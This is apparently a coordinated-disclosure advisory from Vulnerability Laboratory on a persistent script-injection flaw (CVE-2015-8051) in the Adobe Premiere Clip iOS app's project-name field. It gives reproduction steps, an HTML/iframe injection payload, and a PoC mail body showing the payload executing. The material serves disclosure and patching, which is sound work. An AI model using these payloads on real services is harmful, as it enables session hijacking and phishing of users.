Adobe Premiere Clip v1.1.1 iOS - Filter Bypass & Persistent Software Vulnerability

Exploiting Adobe Premiere Clip v1.1.1 iOS Bug to compromise Adobe Creative Cloud (CVE-2015-8051)

In the last weeks Adobe fixed various vulnerabilities in its products Flash Player and Acrobat Reader. Next to this there where security updates for the Adobe Premiere Clip v1.1.1 iOS mobile web-application. The Vulnerability Laboratory Research Team discovered an application-side input validation web vulnerability in the official Adobe Premiere Clip v1.1.1 iOS mobile web-application. The issue affects the validation procedure of the adobe-creative cloud service that is in scope of the program after using the sync function. The vulnerability allows an attacker to bypass the app filter and service validation to execute own malicious codes in a adobe creative cloud module.

The security risk of the filter bypass and persistent validation vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.2. Exploitation of the persistent input validation web vulnerability requires a low privileged adobe user account with restricted access and low user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules (api).

The vulnerability is located in the project name value of the Adobe Premiere Clips iOS mobile web-application. Attackers are able to inject via POST (remote) or Sync (local) own malicious file names. By usage of the share function in connection with a sync the service generates a link to stream the context inside of the mail. The mail is wrong encoded and the cid:x value executes the malicious context. 

The adobe creative cloud service requests via the assets.adobe.com all synced file context. Remote attackers can for example include a malicious project by manipulation of the project name. Thus allows remote attackers to inject a malicious project of the connected cloud apps service to the assets library. After the sync via implement the creative cloud allows to share the context by the application itself or via the mobile app. By opening the exchange method to share, the context executes in the mail body next to the adobe ``cid:x``>  value. Next to that a link is generated to adobe and can be prepared a second time the same way. The encoding of the share function is broken in case of a sync implementation through another device. The names needs to be encoded and the context that is getting dumped into the mail body needs to be parsed in a secure direction. The requests runs through the adobe clips, mobile api and adobe assets service in the creative cloud app.

The bug is located in the input validation of the adobe premier clips app but after the sync the broken context is streamed to the creative cloud service were you have also the ability to share the malicious context again by mail. The main problem is that the data is not getting encoded on sync via cloud. That results in a bypass of the basic filter validation in the app and also the main online-service of adobe.

Proof of Concept (PoC)
The vulnerability can be exploited by remote attackers with low privileged application user account and low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...

1. Install a creative adobe account and use a test browser with the proxy credentials
2. Start to login and choose one of the apps to sync you payload
3. Open the adobe premiere clip app
4. Inject as project a script code payload like bkm%20"><img src="cid:x">%20>%20<iframe src=http://www.evolution-sec.com> and save the project
5. Now open the adobe creative cloud with the assets service and sync all projects with the files
Note: Use the share function to dump the service data in the mail body context through the stage assets by mobile api
6. Successful reproduce of the security vulnerability!

PoC: Exploit

<html> <head> <title>Benjamin Kunz Mejri has shared an Adobe Premiere Clip video with you!</title> <link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css"> </head> <body> <table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><b>Betreff: </b>Benjamin Kunz Mejri has shared an Adobe Premiere Clip video with you!</td></tr><tr><td><b>Von: </b>VLab <vulnerabilitylaber@icloud.com></td></tr><tr><td><b>Datum: </b>28.04.2015 21:59</td></tr></table><table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part2"><tr><td><b>An: </b>bkm@evolution-sec.com</td></tr></table><br> <html><head><meta http-equiv="content-type" content="text/html; "></head><body dir="auto"><div><p>Benjamin Kunz Mejri has shared the video ""><img src="cid:x">"><iframe src="a">%20"><img src="x">" with you! Click the following link to watch this video now: <a href="<a href="http://premiereclip.adobe.com/videos/ESSguR3c8RY">http://premiereclip.ad... href="http://premiereclip.adobe.com/videos/ESSguR3c8RY</a></p><p>Do">http://pr... you have an iPad or iPhone? Create your own Adobe Premiere Clip video by getting the free app here: <a href="<a href="http://www.adobe.com/go/premiereclip">http://www.adobe.com/go/premierecl... href="http://www.adobe.com/go/premiereclip">http://www.adobe.com/go/premierecl... Share on social: #MadeWithClip</p></body></iframe></p></div><div><br><br>Von meinem iPhone gesendet</div></body></html> </body> </html>

PoC Video: In the poc video we demonstrate how to exploit the issue by usage of a ipad that is connected to the creative cloud service. The test account admin@vulnerability-lab.com and bkm@evolution-sec.com was used to test the adobe service with the announced proxy settings. The data is at the end executable in the mail body that comes through a validation lack of the software. The bug is present in several apps that allow us to sync the function in connection with the creative cloud share function. Due to the testings we saw that the service has captured the valid urls by filtering.

Video: Adobe Premiere Clip iOS Application - (cid:x) Filter Bypass & Persistent Software Vulnerability

Reference(s):

http://www.adobe.com/products/postscript/pdfs/cid.pdf
http://www.adobe.com/content/dam/Adobe/en/devnet/font/pdfs/5014.CIDFont_Spec.pdf

Solution - Fix & Patch
The vulnerability can be patched by a secure restriction of the name input in the adobe premiere clip mobile api. Encode and parse the name cid:x input to prevent a persistent script code execution when processing to share the app sync context.

Note: Adobe announced that the vulnerability has been patched in the Adobe Premier Clip software version 1.2.1 stable.

Vulnerability Disclosure Timeline

2015-04-29: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2015-04-30: Vendor Notification (Adobe PSIRT Security Team)
2015-05-04: Vendor Response/Feedback (Adobe PSIRT Security Team)
2015-10-16: Vendor Fix/Patch #1 (Adobe Developer Team)
2015-10-22: Security Acknowledgements (Adobe PSIRT Security Team)
2015-11-12: Vendor Fix/Patch #2 (Adobe Developer Team)
2015-11-17: Security Bulletin (Adobe PSIRT Security Team) [Acknowledgements]
2015-11-18: Public Disclosure (Vulnerability Laboratory)

URL: https://helpx.adobe.com/security/acknowledgements.html?t1

Security Bulletin (CVE-2015-8051)


 

Video: http://www.vulnerability-lab.com/get_content.php?id=1479
Advisory: http://www.vulnerability-lab.com/get_content.php?id=1478

Press Reference(s):

http://www.securityweek.com/adobe-issues-security-fixes-coldfusion-livecycleds-premiere-clip

http://www.heise.de/security/meldung/Patches-ausser-der-Reihe-Adobe-dichtet-ColdFusion-ab-2923825.html

https://threatpost.com/adobe-pushes-hotfix-for-coldfusion/115389/

https://www.us-cert.gov/ncas/current-activity/2015/11/17/Adobe-Releases-Security-Updates-ColdFusion-LiveCycle-Data-Services

Rate this article: 
Average: 4.2 (6 votes)

Add new comment

Plain text

  • No HTML tags allowed.